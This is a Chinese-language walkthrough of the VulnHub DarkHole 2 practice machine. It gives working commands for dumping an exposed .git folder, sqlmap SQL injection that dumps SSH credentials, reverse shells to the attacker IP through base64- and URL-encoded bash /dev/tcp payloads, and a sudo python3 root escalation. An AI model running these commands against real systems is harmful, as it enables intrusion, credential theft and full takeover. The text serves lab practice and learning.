下载地址:https://download.vulnhub.com/darkhole/darkhole_2.zip
攻击者IP:172.20.134.129 nat vmare
受害者IP:172.20.134.143 nat wmare
参考:https://blog.csdn.net/MRS_jianai/article/details/128480361
https://www.cnblogs.com/wdd-blog/p/15230826.html
https://blog.csdn.net/weixin_44862511/article/details/132259658
主机发现
端口扫描
目录扫描
发现git文件泄露
git文件泄露利用
https://github.com/lijiejie/GitHack
在config.php
darkhole_2
pip安装git-dumper
pip3 install git-dumper
使用git-dumper下载git文件夹内容到git_files文件夹
git-dumper http://172.20.134.143/.git/ git_files
git log查看日志
git diff命令,这是在Git中用来显示提交(commit)、提交和工作树、工作树等之间差异的一个命令
发现用户名和密码
if($POST['email'] == "[email protected]" && $POST['password'] == "321"){
登陆后台
?id=1可能有sql注入,使用sqlmap
sqlmap -r 1.txt -D darkhole_2 --tables --batch
查看ssh表
sqlmap -r 1.txt -D darkhole_2 -T ssh --columns --batch
sqlmap -r 1.txt -D darkhole_2 -T ssh -C id,user,pass --dump --batch
获得ssh表的用户和密码
jehad/fool
查看users表
sqlmap -r 1.txt -D darkhole_2 -T users --columns --batch
没有更多的信息了
sqlmap -r 1.txt -D darkhole_2 -T users -C id,emaid,username,password --dump --batch
ssh登录用户jehad,
发现其他用户lama losy
查看历史命令
发现9999端口可能有rce
cat /etc/crontab
查看定时任务也能查看
lsy用户的rce
base64编码
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTM0LjEyOS8xMTExIDA+JjE=" | base64 -d | bash
试了几个反弹shell的命令都没成功
/opt/web可以看到源码
重新连接登陆 ssh,将本地端口 9999 端口与远程主机端口映射,访问本地端口转发到远程主机
ssh [email protected] -L 9999:localhost:9999
反弹shell
应为是get,所以要url编码
curl 127.0.0.1:9999?cmd=bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f172.20.134.129%2f1111+0%3e%261%27
连接losy
发现losy的密码
losy/gang
sudo -l
sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' or sudo python3 -c 'import os; os.system("/bin/bash")'
原文始发于微信公众号(王之暴龙战神):DarkHole2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论